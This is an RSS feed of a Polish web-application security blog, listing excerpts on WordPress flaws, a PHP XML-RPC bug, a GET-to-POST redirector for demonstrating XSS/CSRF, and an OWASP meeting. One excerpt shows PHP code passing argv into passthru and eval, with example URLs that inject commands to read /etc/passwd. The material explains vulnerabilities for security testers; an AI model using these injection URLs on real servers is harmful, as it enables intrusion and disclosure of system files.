<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>runic.pl</title>
	<atom:link href="http://runic.pl/feed/" rel="self" type="application/rss+xml" />
	<link>http://runic.pl</link>
	<description>Bezpieczeństwo aplikacji internetowych</description>
	<lastBuildDate>Fri, 08 Jul 2011 08:20:47 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2</generator>
		<item>
		<title>Z archiwum testera (1)</title>
		<link>http://runic.pl/2009/06/03/z-archiwum-testera-1/</link>
		<comments>http://runic.pl/2009/06/03/z-archiwum-testera-1/#comments</comments>
		<pubDate>Wed, 03 Jun 2009 20:05:48 +0000</pubDate>
		<dc:creator>Łukasz Pilorz</dc:creator>
				<category><![CDATA[1]]></category>

		<guid isPermaLink="false">http://lukasz.pilorz.net/?p=123</guid>
		<description><![CDATA[Historia problemów z bezpieczeństwem WordPressa mogłaby posłużyć za wzorcowy scenariusz szkolenia. Poza wieloma odsłonami klasycznych błędów XSS, SQL Injection czy Directory Traversal, pojawiają się tam wątki kryptografii, różnorodnego kodowania znaków, uwierzytelnienia i autoryzacji, filtrowania danych na zbyt wczesnym etapie, podatności na DoS, słabych haseł osób mających dostęp do produkcji&#8230; Dorzucę do kompletu błąd, którego dotąd [...]]]></description>
		<wfw:commentRss>http://runic.pl/2009/06/03/z-archiwum-testera-1/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Trochę historii</title>
		<link>http://runic.pl/2009/05/23/troche-historii/</link>
		<comments>http://runic.pl/2009/05/23/troche-historii/#comments</comments>
		<pubDate>Fri, 22 May 2009 23:53:32 +0000</pubDate>
		<dc:creator>Łukasz Pilorz</dc:creator>
				<category><![CDATA[1]]></category>

		<guid isPermaLink="false">http://lukasz.pilorz.net/?p=101</guid>
		<description><![CDATA[W 2005 roku James Bercegay opublikował informację o luce w PHP XML-RPC, o której wówczas było dość głośno (m.in. ze względu na ujawnienie exploita). Zaraz po wydaniu poprawionej wersji 1.1.1 pojawiła się kolejna publikacja, tym razem autorstwa Stefana Essera. Dokładnych szczegółów drugiego błędu o ile się nie mylę nigdy nie opublikowano &#8211; pamiętam że po [...]]]></description>
		<wfw:commentRss>http://runic.pl/2009/05/23/troche-historii/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Anonimowe przekierowanie GET-&gt;POST</title>
		<link>http://runic.pl/2009/04/25/anonimowe-przekierowanie-get-post/</link>
		<comments>http://runic.pl/2009/04/25/anonimowe-przekierowanie-get-post/#comments</comments>
		<pubDate>Sat, 25 Apr 2009 20:12:55 +0000</pubDate>
		<dc:creator>Łukasz Pilorz</dc:creator>
				<category><![CDATA[1]]></category>

		<guid isPermaLink="false">http://lukasz.pilorz.net/?p=91</guid>
		<description><![CDATA[Jeszcze jedna alternatywa dla korzystających z narzędzi typu XSS Post Forwarder, CSRF Proxy lub CSRF Redirector: http://lukasz.pilorz.net/xss/r.html#http://lukasz.pilorz.net/xss/target.php?get=1&#38;other_get=2#POST#post=1&#60;b&#62;test&#60;/b&#62;&#38;empty=&#38;null=te%00st Od innych skryptów tego typu różni się pewnym stopniem anonimowości &#8211; parametry przekazywane są do skryptu we fragmentcie URL nie przesyłanym do serwera. Można swobodnie wykorzystywać go do demonstacji luk (nie tylko XSS/CSRF) wymagających żądania POST lub skopiować [...]]]></description>
		<wfw:commentRss>http://runic.pl/2009/04/25/anonimowe-przekierowanie-get-post/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Skrypty CLI w DocumentRoot</title>
		<link>http://runic.pl/2009/03/17/skrypty-cli-w-documentroot/</link>
		<comments>http://runic.pl/2009/03/17/skrypty-cli-w-documentroot/#comments</comments>
		<pubDate>Tue, 17 Mar 2009 14:50:40 +0000</pubDate>
		<dc:creator>Łukasz Pilorz</dc:creator>
				<category><![CDATA[1]]></category>

		<guid isPermaLink="false">http://lukasz.pilorz.net/?p=85</guid>
		<description><![CDATA[W Google Code Search można znaleźć sporo aplikacji i bibliotek PHP zawierających kod podobny do poniższych przykładów: http://lukasz.pilorz.net/testy/argv/passthru.phps &#60;?php passthru('echo '.$_SERVER['argv'][1]); ?&#62; http://lukasz.pilorz.net/testy/argv/eval.phps &#60;?php eval('echo "'.$_SERVER['argv'][1].'";'); ?&#62; Jeśli włączona jest dyrektywa register_argc_argv, a skrypt znajduje się w DocumentRoot, można go wykorzystać na przykład tak: http://lukasz.pilorz.net/testy/argv/passthru.php?+&#124;{cat,/etc/passwd} http://lukasz.pilorz.net/testy/argv/eval.php?x={cat,/etc/passwd}&#038;+{${passthru($_GET[x])}}]]></description>
		<wfw:commentRss>http://runic.pl/2009/03/17/skrypty-cli-w-documentroot/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Spotkanie OWASP</title>
		<link>http://runic.pl/2008/10/20/spotkanie-owasp/</link>
		<comments>http://runic.pl/2008/10/20/spotkanie-owasp/#comments</comments>
		<pubDate>Mon, 20 Oct 2008 13:04:29 +0000</pubDate>
		<dc:creator>Łukasz Pilorz</dc:creator>
		
		<guid isPermaLink="false">http://lukasz.pilorz.net/?p=69</guid>
		<description><![CDATA[Zapraszam na spotkanie polskiego oddziału OWASP w najbliższy czwartek w Krakowie. Szczegóły można znaleźć pod adresem https://www.owasp.org/index.php/Poland]]></description>
		<wfw:commentRss>http://runic.pl/2008/10/20/spotkanie-owasp/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>

